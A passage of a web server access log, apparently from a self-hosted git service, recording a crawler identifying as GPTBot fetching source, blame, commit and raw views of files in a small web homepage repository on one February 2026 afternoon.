- GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 34390] [Gzip 9.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 53090] [Gzip 13.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" +[17/Feb/2026:13:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 11663] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:13:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" +[17/Feb/2026:13:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 11178] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" +[17/Feb/2026:13:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" +[17/Feb/2026:13:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" +[17/Feb/2026:13:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 10950] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" +[17/Feb/2026:13:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:13:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 74.7.227.38] [Length 10573] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 10838] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:13:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 74.7.227.38] [Length 9972] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 10269] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 11849] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 11262] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" +[17/Feb/2026:13:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" +[17/Feb/2026:13:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" +[17/Feb/2026:13:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" +[17/Feb/2026:13:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 10777] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" +[17/Feb/2026:13:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 11207] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" +[17/Feb/2026:13:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" +[17/Feb/2026:13:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" +[17/Feb/2026:13:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" +[17/Feb/2026:13:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" +[17/Feb/2026:13:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" +[17/Feb/2026:13:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 10824] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" +[17/Feb/2026:13:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 10349] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" +[17/Feb/2026:13:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 11183] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" +[17/Feb/2026:13:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" +[17/Feb/2026:13:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" +[17/Feb/2026:13:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" +[17/Feb/2026:13:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" +[17/Feb/2026:13:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" +[17/Feb/2026:13:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" +[17/Feb/2026:13:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 11667] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" +[17/Feb/2026:13:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" +[17/Feb/2026:13:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" +[17/Feb/2026:13:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 10354] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:13:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 48879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:13:06:34 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 10316] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:13:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 11021] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" +[17/Feb/2026:13:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 10951] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" +[17/Feb/2026:13:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" +[17/Feb/2026:13:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" +[17/Feb/2026:13:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 10939] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 